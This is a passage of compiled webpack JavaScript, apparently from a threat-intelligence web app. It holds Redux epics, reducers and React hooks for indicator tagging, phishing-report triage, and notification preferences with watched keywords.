        return { type: __WEBPACK_IMPORTED_MODULE_8__action_types__["d" /* ADD_INDICATOR_TAG_SUCCESS */], payload: _extends({ value: value, type: type }, tag) };
      }).concat(removedTags.map(function (tag) {
        return {
          type: __WEBPACK_IMPORTED_MODULE_8__action_types__["p" /* REMOVE_INDICATOR_TAG_SUCCESS */],
          payload: Object(__WEBPACK_IMPORTED_MODULE_12_modules_indicators_utils__["a" /* normalizeIndicatorShape */])(_extends({ value: value, type: type }, tag))
        };
      })).concat(postOpActions);

      var successMessage = Object(__WEBPACK_IMPORTED_MODULE_4_modules_tags_utils__["bulkTagSuccessMessage"])(addedTags, removedTags);
      return successMessage ? tagOperations.concat(Object(__WEBPACK_IMPORTED_MODULE_10__alerts_actions__["success"])(successMessage)) : tagOperations;
    }).catch(function (err) {
      var message = Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["path"])(['xhr', 'response', 'message'], err);
    });
  });
};

var deleteIndicatorTagEpic = function deleteIndicatorTagEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["n" /* REMOVE_INDICATOR_TAG */]).mergeMap(function (_ref9) {
    var payload = _ref9.payload;

    return ajax.postJSON(indicatorsUrl(payload, __WEBPACK_IMPORTED_MODULE_7__types__["c" /* INDICATOR_TAGS_ENDPOINT */] + '/delete')).map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('response')).mergeMap(function (_ref10) {
      var guid = _ref10.guid,
          name = _ref10.name;

      return [{ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["k" /* FETCH_INDICATOR_TAGS */] }, { type: __WEBPACK_IMPORTED_MODULE_8__action_types__["p" /* REMOVE_INDICATOR_TAG_SUCCESS */], payload: Object(__WEBPACK_IMPORTED_MODULE_12_modules_indicators_utils__["a" /* normalizeIndicatorShape */])(payload) }, Object(__WEBPACK_IMPORTED_MODULE_10__alerts_actions__["success"])(name + ' tag removed from indicator.')];
    }).catch(function (err) {
      return [{ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["o" /* REMOVE_INDICATOR_TAG_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_10__alerts_actions__["error"])('Indicator tag could not be removed.')];
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchAttributesEpic, fetchEnclaveTagsEpic, fetchIndicatorTagsEpic, addIndicatorTagEpic, deleteIndicatorTagEpic, addIndicatorTagsBulk));

/***/ }),
/* 3426 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export createSearchQuery */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__web_modules_trustar_2_0_hooks_useTriageService__ = __webpack_require__(3427);




/**
 * Base template for a triage query
 * @param enclaveIds
 * @param selectedDateRange
 * @param selectedTriageStatus
 * @param cursorInRequestPayload
 * @returns {*}
 */
function createSearchQuery(enclaveIds, selectedDateRange, selectedTriageStatus, cursorInRequestPayload) {
  return __WEBPACK_IMPORTED_MODULE_2__web_modules_trustar_2_0_hooks_useTriageService__["a" /* defaultTriagePayload */].set('from', Date.parse(selectedDateRange)).set('enclaveIds', enclaveIds).set('cursor', cursorInRequestPayload).set('status', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])([].concat(selectedTriageStatus)));
}

/***/ }),
/* 3427 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return defaultTriagePayload; });
/* unused harmony export useTriageService */
/* unused harmony export useTriageSubmissionStatusService */
/* unused harmony export createSearchQuery */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__useAjax__ = __webpack_require__(1638);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__constants__ = __webpack_require__(877);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_utils_Date_constants__ = __webpack_require__(236);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__src_app_components_phishing_views_constants__ = __webpack_require__(1639);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__useCursorPagination__ = __webpack_require__(1650);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();










var defaultTriagePayload = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  from: Date.parse(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_utils_Date_constants__["a" /* default */].LAST_MONTH),
  to: Date.now(),
  enclaveIds: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])([]),
  normalizedTriageScore: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])(__WEBPACK_IMPORTED_MODULE_3__constants__["g" /* TRIAGE_STATUS_OPTIONS */]),
  normalizedIndicatorScore: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])(__WEBPACK_IMPORTED_MODULE_3__constants__["g" /* TRIAGE_STATUS_OPTIONS */]),
  status: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])(__WEBPACK_IMPORTED_MODULE_3__constants__["c" /* PHISHING_STATUS_OPTIONS */])
});

/**
 * Main Ajax Hook for triage submissions fetching/filtering/sorting
 * @param enclaves
 * @param selectedTriageStatus
 * @param selectedDateRange
 * @returns {{totalItems: *, cursorControl: *, response: *, goBackward: *, goForward: *, refetch: *, error: *}}
 */
var useTriageService = function useTriageService(enclaves, selectedTriageStatus, selectedDateRange) {
  /* fetchCount is an integer used to retrigger a fetch
    (if the fetchCount number changes an ajax call with the current payload is fired)
   */
  var _React$useState = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(0),
      _React$useState2 = _slicedToArray(_React$useState, 2),
      fetchCount = _React$useState2[0],
      setFetchCount = _React$useState2[1];

  var triageServiceCursorPagination = Object(__WEBPACK_IMPORTED_MODULE_6__useCursorPagination__["a" /* useCursorPagination */])();
  var goBackward = triageServiceCursorPagination.goBackward,
      goForward = triageServiceCursorPagination.goForward,
      cursorForCurrentPage = triageServiceCursorPagination.cursorForCurrentPage,
      resetCursor = triageServiceCursorPagination.reset,
      addNextCursor = triageServiceCursorPagination.addNextCursor;

  var _React$useState3 = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(''),
      _React$useState4 = _slicedToArray(_React$useState3, 2),
      cursorInRequestPayload = _React$useState4[0],
      setCursorForPayloadRequest = _React$useState4[1];

  var _React$useState5 = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(0),
      _React$useState6 = _slicedToArray(_React$useState5, 2),
      totalItems = _React$useState6[0],
      setTotalItems = _React$useState6[1];

  var refetch = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useCallback(function () {
    setFetchCount(fetchCount + 1);
  }, [fetchCount]);

  var enclaveIds = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useMemo(function () {
    return enclaves.map(function (enc) {
      return enc.get('id');
    });
  }, [enclaves]);
  var ajax = Object(__WEBPACK_IMPORTED_MODULE_2__useAjax__["a" /* useAjax */])(function (ajax) {

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_3__constants__["e" /* TRIAGE_ENDPOINT */], createSearchQuery(enclaveIds, selectedDateRange, selectedTriageStatus, cursorInRequestPayload));
  }, enclaves.size > 0);

  // $FlowFixMe: React.useEffect coming soon.
  __WEBPACK_IMPORTED_MODULE_0_react___default.a.useEffect(function () {
    ajax.get('executeRequest')();
  }, [selectedTriageStatus, selectedDateRange, cursorInRequestPayload, fetchCount]);

  // $FlowFixMe: React.useEffect coming soon.
  __WEBPACK_IMPORTED_MODULE_0_react___default.a.useEffect(function () {
    /* We always take an use a nextCursor value returned to us by the server because between paginating
      the query results may have changed and thus their cursor will be as well
    */
    var nextCursor = ajax.getIn(['response', 'responseMetadata', 'nextCursor']);
    if (nextCursor) addNextCursor(nextCursor);

    var updatedTotalItems = ajax.getIn(['response', 'responseMetadata', 'totalItems']);
    if (updatedTotalItems) {
      setTotalItems(updatedTotalItems);
    }
  }, [addNextCursor]);

  // $FlowFixMe: React.useEffect coming soon.
  __WEBPACK_IMPORTED_MODULE_0_react___default.a.useEffect(function () {
    setCursorForPayloadRequest(cursorForCurrentPage);
  }, [cursorForCurrentPage]);

  return _extends({}, ajax.toJS(), {
    response: ajax.get('response'),
    error: ajax.get('errorResponse'),
    totalItems: totalItems,
    goForward: goForward,
    goBackward: goBackward,
    cursorControl: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(triageServiceCursorPagination),
    refetch: refetch
  });
};

/**
 * Ajax hook for handling updates to a reports submission status (IGNORED, UNRESOLVED, CONFIRMED)
 * @returns {{response: *, setSubmissionStatus: *}}
 */
var useTriageSubmissionStatusService = function useTriageSubmissionStatusService() {
  var _React$useState7 = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({})),
      _React$useState8 = _slicedToArray(_React$useState7, 2),
      currentPayload = _React$useState8[0],
      setCurrentSubmissionPayload = _React$useState8[1];

  var ajax = Object(__WEBPACK_IMPORTED_MODULE_2__useAjax__["a" /* useAjax */])(function (ajax) {
    return ajax.post(__WEBPACK_IMPORTED_MODULE_3__constants__["e" /* TRIAGE_ENDPOINT */] + '/' + currentPayload.get('submissionId') + '/status?status=' + currentPayload.get('status')).map(function (response) {
      return response;
    });
  }, currentPayload.has('submissionId') && currentPayload.has('status') // Only fire request if both fields/params are there
  );

  var setSubmissionStatus = function setSubmissionStatus(submissionId, status) {
    setCurrentSubmissionPayload(Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
      submissionId: submissionId,
      status: status
    }));

    ajax.get('executeRequest')();
  };

  return _extends({}, ajax.toJS(), {
    response: ajax.get('response'),
    setSubmissionStatus: setSubmissionStatus
  });
};

/**
 * Base template for a triage query
 * @param enclaveIds
 * @param selectedDateRange
 * @param selectedTriageStatus
 * @param cursorInRequestPayload
 * @returns {*}
 */
function createSearchQuery(enclaveIds, selectedDateRange, selectedTriageStatus, cursorInRequestPayload) {
  return defaultTriagePayload.set('from', Date.parse(selectedDateRange)).set('enclaveIds', enclaveIds).set('cursor', cursorInRequestPayload).set('status', Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])([].concat(selectedTriageStatus)));
}

/***/ }),
/* 3428 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__reports_action_types__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types__ = __webpack_require__(799);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__getters__ = __webpack_require__(908);








// TODO Add Default for triage submissions object
var triageSubmissions = function triageSubmissions() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_4__getters__["initialTriageSubmissionsState"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["d" /* FETCH_TRIAGE_REPORTS_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["h" /* SET_TRIAGE_STATUS_FOR_REPORT_SUCCESS */]:
      // TODO Streamline
      var triageReports = state.get('items');
      var updatedReports = triageReports.filter(function (r) {
        return r.get('submissionId') !== payload.submissionId;
      });
      return state.set('items', updatedReports);
    default:
      return state;
  }
};

var isSetTriageStatusInProgress = function isSetTriageStatusInProgress() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["f" /* SET_TRIAGE_STATUS_FOR_REPORT */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["h" /* SET_TRIAGE_STATUS_FOR_REPORT_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["g" /* SET_TRIAGE_STATUS_FOR_REPORT_FAILURE */]:
      return false;
    default:
      return state;
  }
};
var isFetchTriageReportsInProgress = function isFetchTriageReportsInProgress() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["a" /* FETCH_TRIAGE_REPORTS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["b" /* FETCH_TRIAGE_REPORTS_AND_ENRICH */]:
    case __WEBPACK_IMPORTED_MODULE_2__reports_action_types__["k" /* FETCH_METADATA */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["d" /* FETCH_TRIAGE_REPORTS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["c" /* FETCH_TRIAGE_REPORTS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__reports_action_types__["m" /* FETCH_METADATA_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__reports_action_types__["l" /* FETCH_METADATA_FAILURE */]:
      return false;
    default:
      return state;
  }
};

// TODO Create types for payload
var currentTriageQuery = function currentTriageQuery() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_4__getters__["defaultTriageRequestPayload"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["e" /* RESET_PAGE */]:
      return __WEBPACK_IMPORTED_MODULE_4__getters__["defaultTriageRequestPayload"];
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["a" /* FETCH_TRIAGE_REPORTS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["b" /* FETCH_TRIAGE_REPORTS_AND_ENRICH */]:
      return payload;
    default:
      return state;
  }
};

var loadingMessage = function loadingMessage() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["b" /* FETCH_TRIAGE_REPORTS_AND_ENRICH */]:
      return 'Fetching phishing reports';
    case __WEBPACK_IMPORTED_MODULE_2__reports_action_types__["k" /* FETCH_METADATA */]:
      return 'Populating reports metadata';
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["d" /* FETCH_TRIAGE_REPORTS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["c" /* FETCH_TRIAGE_REPORTS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__reports_action_types__["m" /* FETCH_METADATA_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__reports_action_types__["l" /* FETCH_METADATA_FAILURE */]:
      return '';
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  isSetTriageStatusInProgress: isSetTriageStatusInProgress,
  isFetchTriageReportsInProgress: isFetchTriageReportsInProgress,
  triageSubmissions: triageSubmissions,
  currentTriageQuery: currentTriageQuery,
  loadingMessage: loadingMessage
}));

/***/ }),
/* 3429 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_rxjs_operators__ = __webpack_require__(449);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_rxjs_operators___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_rxjs_operators__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_triage_constants__ = __webpack_require__(570);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__reports_action_types__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__reports_actions__ = __webpack_require__(409);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__action_types__ = __webpack_require__(799);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__actions__ = __webpack_require__(1470);















var debug = __WEBPACK_IMPORTED_MODULE_0_debug___default()('app:modules:triage:epics'); // eslint-disable-line no-unused-vars

var setTriageStatusEpic = function setTriageStatusEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types__["f" /* SET_TRIAGE_STATUS_FOR_REPORT */]).mergeMap(function (_ref2) {
    var payload = _ref2.payload;

    return ajax.post(__WEBPACK_IMPORTED_MODULE_5_modules_triage_constants__["c" /* TRIAGE_ENDPOINT */] + '/' + payload.submissionId + '/status?status=' + payload.status).mergeMap(function (response) {
      return [{ type: __WEBPACK_IMPORTED_MODULE_9__action_types__["h" /* SET_TRIAGE_STATUS_FOR_REPORT_SUCCESS */], payload: payload }, Object(__WEBPACK_IMPORTED_MODULE_6__alerts_actions__["success"])('Submission status set to ' + payload.status)];
    }).catch(function (err) {
      return [{ type: __WEBPACK_IMPORTED_MODULE_9__action_types__["g" /* SET_TRIAGE_STATUS_FOR_REPORT_FAILURE */] }, // TODO Error Handling
      Object(__WEBPACK_IMPORTED_MODULE_6__alerts_actions__["error"])('An error occurred and the submission status could be updated')];
    });
  });
};

var fetchEnrichedTriageReportsEpic = function fetchEnrichedTriageReportsEpic(action$, _, _ref3) {
  var ajax = _ref3.ajax;
  return action$.pipe(Object(__WEBPACK_IMPORTED_MODULE_2_redux_observable__["ofType"])(__WEBPACK_IMPORTED_MODULE_9__action_types__["b" /* FETCH_TRIAGE_REPORTS_AND_ENRICH */]), Object(__WEBPACK_IMPORTED_MODULE_4_rxjs_operators__["switchMap"])(function (action) {
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_5_modules_triage_constants__["c" /* TRIAGE_ENDPOINT */], action.payload).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).switchMap(function (response) {
      var reportIds = response.items.map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["propOr"])('', 'submissionId'));

      return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].if(function () {
        return reportIds.length > 0;
      }, action$.pipe(Object(__WEBPACK_IMPORTED_MODULE_2_redux_observable__["ofType"])(__WEBPACK_IMPORTED_MODULE_7__reports_action_types__["m" /* FETCH_METADATA_SUCCESS */]), Object(__WEBPACK_IMPORTED_MODULE_4_rxjs_operators__["mapTo"])(__WEBPACK_IMPORTED_MODULE_10__actions__["fetchTriageReportsSuccess"](response)), Object(__WEBPACK_IMPORTED_MODULE_4_rxjs_operators__["startWith"])(__WEBPACK_IMPORTED_MODULE_8__reports_actions__["fetchReportMetadata"](reportIds, true))), __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].of(__WEBPACK_IMPORTED_MODULE_10__actions__["fetchTriageReportsSuccess"](response)));
    }).catch(function (error) {
      return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].of(__WEBPACK_IMPORTED_MODULE_10__actions__["fetchTriageReportsFailure"](error));
    });
  }));
};

var fetchTriageReportsEpic = function fetchTriageReportsEpic(action$, _, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types__["a" /* FETCH_TRIAGE_REPORTS */]).mergeMap(function (_ref5) {
    var payload = _ref5.payload;

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_5_modules_triage_constants__["c" /* TRIAGE_ENDPOINT */], payload).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (response) {
      return __WEBPACK_IMPORTED_MODULE_10__actions__["fetchTriageReportsSuccess"](response);
    }).catch(function (error) {
      return __WEBPACK_IMPORTED_MODULE_10__actions__["fetchTriageReportsFailure"](error);
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_2_redux_observable__["combineEpics"])(setTriageStatusEpic, fetchTriageReportsEpic, fetchEnrichedTriageReportsEpic));

/***/ }),
/* 3430 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchPreferences", function() { return fetchPreferences; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updatePreferences", function() { return updatePreferences; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchWatchedKeywords", function() { return fetchWatchedKeywords; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "addWatchedKeyword", function() { return addWatchedKeyword; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteWatchedKeyword", function() { return deleteWatchedKeyword; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(800);




var fetchPreferences = function fetchPreferences() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["g" /* FETCH_PREFERENCES */] };
};
var updatePreferences = function updatePreferences(notificationPreferences) {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["m" /* UPDATE_PREFERENCES */], payload: notificationPreferences };
};

var fetchWatchedKeywords = function fetchWatchedKeywords() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["j" /* FETCH_WATCHED_KEYWORDS */] };
};
var addWatchedKeyword = function addWatchedKeyword(keyword) {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* ADD_WATCHED_KEYWORD */], payload: { keyword: keyword } };
};
var deleteWatchedKeyword = function deleteWatchedKeyword(keyword) {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* DELETE_WATCHED_KEYWORD */], payload: keyword };
};

/***/ }),
/* 3431 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export notificationPreferences */
/* unused harmony export watchedKeywords */
/* unused harmony export loading */
/* unused harmony export watchedKeywordsLoading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(800);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__types__ = __webpack_require__(801);







var notificationPreferences = function notificationPreferences() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_3__types__["NotificationPreferences"])();
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["i" /* FETCH_PREFERENCES_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(action.payload, __WEBPACK_IMPORTED_MODULE_3__types__["toNotificationPreferences"]);
    default:
      return state;
  }
};

var watchedKeywords = function watchedKeywords() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])();
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["l" /* FETCH_WATCHED_KEYWORDS_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(action.payload, __WEBPACK_IMPORTED_MODULE_3__types__["toWatchedKeywords"]);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["g" /* FETCH_PREFERENCES */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["m" /* UPDATE_PREFERENCES */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["j" /* FETCH_WATCHED_KEYWORDS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* ADD_WATCHED_KEYWORD */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["d" /* DELETE_WATCHED_KEYWORD */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["i" /* FETCH_PREFERENCES_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["o" /* UPDATE_PREFERENCES_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["l" /* FETCH_WATCHED_KEYWORDS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["k" /* FETCH_WATCHED_KEYWORDS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* ADD_WATCHED_KEYWORD_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* ADD_WATCHED_KEYWORD_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["f" /* DELETE_WATCHED_KEYWORD_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["e" /* DELETE_WATCHED_KEYWORD_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var watchedKeywordsLoading = function watchedKeywordsLoading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["j" /* FETCH_WATCHED_KEYWORDS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* ADD_WATCHED_KEYWORD */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["d" /* DELETE_WATCHED_KEYWORD */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["l" /* FETCH_WATCHED_KEYWORDS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["k" /* FETCH_WATCHED_KEYWORDS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* ADD_WATCHED_KEYWORD_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* ADD_WATCHED_KEYWORD_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["f" /* DELETE_WATCHED_KEYWORD_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["e" /* DELETE_WATCHED_KEYWORD_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  watchedKeywordsLoading: watchedKeywordsLoading,
  notificationPreferences: notificationPreferences,
  loading: loading,
  watchedKeywords: watchedKeywords
}));

/***/ }),
/* 3432 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export fetchPreferencesEpic */
/* unused harmony export updatePreferencesEpic */
/* unused harmony export fetchWatchedKeywordsEpic */
